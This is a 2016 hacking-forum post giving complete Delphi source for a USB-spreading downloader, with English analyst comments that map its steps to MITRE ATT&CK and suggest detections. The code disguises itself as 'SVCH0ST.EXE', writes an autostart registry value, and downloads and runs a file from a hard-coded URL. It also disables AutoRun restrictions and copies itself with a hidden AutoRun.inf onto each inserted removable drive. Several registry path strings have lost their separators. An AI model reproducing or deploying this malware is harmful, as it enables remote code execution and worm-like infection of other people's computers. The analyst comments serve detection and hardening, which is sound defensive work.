HanDs
管理员

[Delphi文章] 下载者U盘传染源码 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全


unit Un_Main;


interface


uses
     Windows, Messages, SysUtils,Forms,IniFiles;
type
     { Only form declared in this unit. It handles form creation and closing and
       receives WM_DEVICECHANGE broadcasts through the message-bound method below. }
     TFrm_Main = class(TForm)
     // Runs once when the form is created; holds the install/persistence check.
     procedure FormCreate(Sender: TObject);
     // Terminates the application when the form closes.
     procedure FormClose(Sender: TObject; var Action: TCloseAction);
     private
     // Bound to WM_DEVICECHANGE, so Windows calls it on device arrival/removal
     // broadcasts. The removable-drive copy logic lives here.
     procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
     public
     { Public declarations }
     end;
const
         // File name used for the copy in the system directory and for the copy
         // written to removable drives. Analyst note: the fifth character is the
         // digit zero, so the name appears chosen to resemble the legitimate
         // svchost.exe (name masquerading, MITRE ATT&CK T1036.005).
         exefile = 'SVCH0ST.EXE';
         // Hard-coded URL that Startup passes to URLDownloadToFileA. Value is
         // reproduced as printed on the page.
         Buffer = 'http://www.888.com/hello.exe';
         // WM_DEVICECHANGE constants. Only DBT_DEVICEARRIVAL and DBT_DEVTYP_VOLUME
         // are referenced by the code in this unit.
         DBT_DEVICEARRIVAL = $8000;     // system detected a new device
         DBT_DEVICEREMOVECOMPLETE = $8004;     // device is gone
         DBT_DEVTYP_VOLUME = $00000002;     // logical volume
         DBTF_MEDIA = $0001;     // media comings and goings
type
    // Delphi declaration of the common header that WM_DEVICECHANGE passes in
    // LParam. dbch_devicetype says which concrete structure follows.
    PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR;
    TDEV_BROADCAST_HDR = packed record
     dbch_size : DWORD;
     dbch_devicetype : DWORD;
     dbch_reserved : DWORD;
    end;
     // Volume-specific variant of the header. WMDeviceChange casts to it when
     // dbch_devicetype equals DBT_DEVTYP_VOLUME.
     PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME;
     TDEV_BROADCAST_VOLUME = packed record
         dbcv_size : DWORD;
         dbcv_devicetype : DWORD;
         dbcv_reserved : DWORD;
         // Bit mask of affected drive letters; WMDeviceChange treats bit 0 as 'A'
         // (it adds 65 to the bit index).
         dbcv_unitmask : DWORD;
         dbcv_flags : WORD;
     end;


// Static import of URLDownloadToFileA from URLMON.DLL: fetches URL and saves it
// to FileName. Importing it directly avoids pulling in the UrlMon unit.
// Analyst note: a small GUI binary that imports this API together with WinExec
// and registry-write functions matches the usual downloader profile
// (MITRE ATT&CK T1105); proxy and EDR logs of urlmon-initiated .exe downloads
// are a practical detection point.
function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord;
                                     StatusCB: Pointer): LongWord;
                                     stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';


// Static import of WinExec from kernel32.dll, redeclared here with a PAnsiChar
// command line. Startup uses it to launch the downloaded file.
function WinExec(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord;
                         stdcall; external 'kernel32.dll' name 'WinExec';


var
     // Global form instance, per the usual Delphi form-unit layout.
     Frm_Main: TFrm_Main;
     // Path of the installed executable. FormCreate assigns it from the system
     // directory plus exefile; Startup and WMDeviceChange read it.
     exefull:string;
implementation


{$R *.dfm}


// Writes a REG_EXPAND_SZ value `name` = `value` under `key`\`subkey`, creating
// the subkey when it does not exist (RegCreateKey).
// Returns True only when RegSetValueEx reports success (0). The status of
// RegCreateKey itself is not examined.
// Analyst note: in this unit the only caller is Startup, which uses it to
// register an autostart value, so registry auditing on the target key (for
// example Sysmon registry events 12/13) will record the write.
function SetRegValue(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
     result := false;
     RegCreateKey(key,PChar(subkey),regkey);
     if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
     result := true;
     RegCloseKey(regkey);
end;


// Install routine, called by FormCreate when the "already installed" check
// fails. TheName is the target file path (FormCreate passes exefull).
// The steps run in order, and no return value is checked:
//   1. register an autostart value named 'SVCH0ST' pointing at TheName;
//   2. download the hard-coded URL (Buffer) to TheName;
//   3. mark the file hidden + system;
//   4. show a message box;
//   5. execute the file.
// Analyst note: this is persistence via an autostart registry value
// (MITRE ATT&CK T1547.001) combined with download-and-execute (T1105) and
// hidden-file attributes (T1564.001). The subkey literal is reproduced as
// printed on the page and contains no path separators; it looks like the
// HKLM CurrentVersion Run location with separators lost in rendering, so
// confirm against an actual sample before using it as an indicator.
procedure Startup(var TheName:string);
begin
     SetRegValue(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun','SVCH0ST',TheName);
     UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil);
     SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
     // Shown unconditionally: the download result above is not inspected.
     messagebox(0,'文件下载成功!','成功',MB_OK);
     WinExec(PChar(TheName), SW_SHOWDEFAULT);
     // The lines below are disabled in the posted source. DeleteMe is not defined
     // anywhere in this listing.
     //Sleep(500);
     //DeleteMe;
     //freemem(@path,256);
end;


// WM_DEVICECHANGE handler. Acts only on DBT_DEVICEARRIVAL for a logical volume:
// it derives the new drive's letter from dbcv_unitmask, copies the installed
// executable (exefull) onto that drive under the name in exefile, and writes an
// AutoRun.inf whose [AutoRun] open= entry names that copy.
// Analyst note: this is replication through removable media (MITRE ATT&CK T1091).
// Useful telemetry is an AutoRun.inf plus a hidden executable created in the root
// of a newly mounted volume, and a write to the NoDriveTypeAutoRun policy value.
// Hardening: enforce NoDriveTypeAutoRun = 0xFF through machine policy. Windows 7
// and later also ignore open= entries on non-optical removable media.
// Path literals are reproduced as printed on the page and appear to have lost
// their separators in rendering, so do not treat them as exact indicators.
procedure TFrm_Main.WMDeviceChange(var Msg: TMessage);
var
     lpdb : PDEV_BROADCAST_HDR;
     lpdbv : PDEV_BROADCAST_VOLUME;
     unitmask:DWORD;
     i:integer;
     MyIni:TIniFile;
     s:Hkey;
     value:dword ;
     inifile:string;
begin
     // LParam carries a pointer to the broadcast header for this event.
     lpdb := PDEV_BROADCAST_HDR(Msg.LParam);
     case Msg.WParam of
     DBT_DEVICEARRIVAL :// a device has finished installing


     if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then
     begin
         lpdbv := PDEV_BROADCAST_VOLUME(lpdb);
         unitmask:=lpdbv.dbcv_unitmask;// get the drive-letter bit mask of the device
         for i:=0 to 25 do // walk the 26 possible drive letters
         begin
             if Boolean(unitmask and $1)then// lowest bit set: this is the drive that changed
             break;
             unitmask := unitmask shr 1;
         end;
         // After the loop, i is the index of the first set bit; char(i+65) maps 0 to 'A'.
         if fileexists(exefull) then     // copy the file to the USB drive
         begin
         copyfile(PChar(exefull),Pchar(char(i+65) + ':' + exefile),false);
         // $3 = faReadOnly ($1) + faHidden ($2)
         FileSetAttr(char(i+65) + ':' + exefile,$00000003);
         end;
         inifile:=char(i+65)+':AutoRun.inf';// ini file
         // Sets NoDriveTypeAutoRun to 0 for the current user, which removes all
         // drive-type restrictions from that policy value. The RegOpenKeyEx result
         // is not checked.
         RegOpenKeyEx(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer', 0, KEY_ALL_ACCESS, s);
         value:=0;
         RegSetValueEx(s,'NoDriveTypeAutoRun',0, REG_DWORD,@value, sizeof(value));
         RegCloseKey(s);
         // Any AutoRun.inf already on the drive is stripped of attributes and deleted.
         if fileexists(inifile) then
         begin
         FileSetAttr(inifile,$00000000);
         DeleteFile(inifile);
         end;
         // Writes [AutoRun] open=<exefile>. The TIniFile object is not freed in this
         // procedure.
         MyIni := TIniFile.Create(inifile);
         MyIni.WriteString('AutoRun', 'open',exefile);
         // Marks the new AutoRun.inf read-only + hidden ($3).
         FileSetAttr(inifile,$00000003);
     end;
    end;
end;


// Form-creation handler and effective entry point of the program logic.
// It hides the main form, builds exefull from the system directory and exefile,
// and reads the autostart value named 'SVCH0ST'. If a file exists at the
// hard-coded path and the registry value matches exefull (case-insensitive), it
// only shows a message box. Otherwise it calls Startup, which writes the
// autostart value, downloads the file and executes it.
// Analyst note: the process runs without a visible window, and the value name
// and file name are the fixed strings shown here, which makes them candidate
// host indicators. Path literals are reproduced as printed on the page and
// appear to have lost their separators in rendering, so confirm them against a
// real sample.
procedure TFrm_Main.FormCreate(Sender: TObject);
var
s:hkey;
value:array[0..255]of char;
size:cardinal;
path:array[0..255] of char;
begin
     // No main window is ever shown to the user.
     Application.ShowMainForm:=False;
     // Passes 120 as the buffer length although path holds 256 characters.
     getsystemdirectory(path,120);
     exefull := strpas(path) + '' + exefile;
     size:=256;
     // Return values of the three registry calls are not checked. If the query
     // fails, value keeps whatever the stack buffer contained.
     RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun',0,KEY_ALL_ACCESS,s);
     RegQueryValueEx(s,'SVCH0ST',nil,nil,@value,@size);
     RegCloseKey(s);
     // file exists and the autostart entry is registered
     if fileexists('C:WINDOWSsystem32SVCH0ST.EXE') and (UpperCase(value) = UpperCase(exefull)) then
     messagebox(0,'自启动成功!','成功',MB_OK)
     else
     Startup(exefull);// download-and-execute routine
end;


procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
{ Close handler for the main form: asks the VCL application object to shut the
  whole process down. Sender and Action are not used. }
begin
  Application.Terminate;
end;


end.


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
发帖时间:2016-7-9   |   查看数:0   |   回复数:0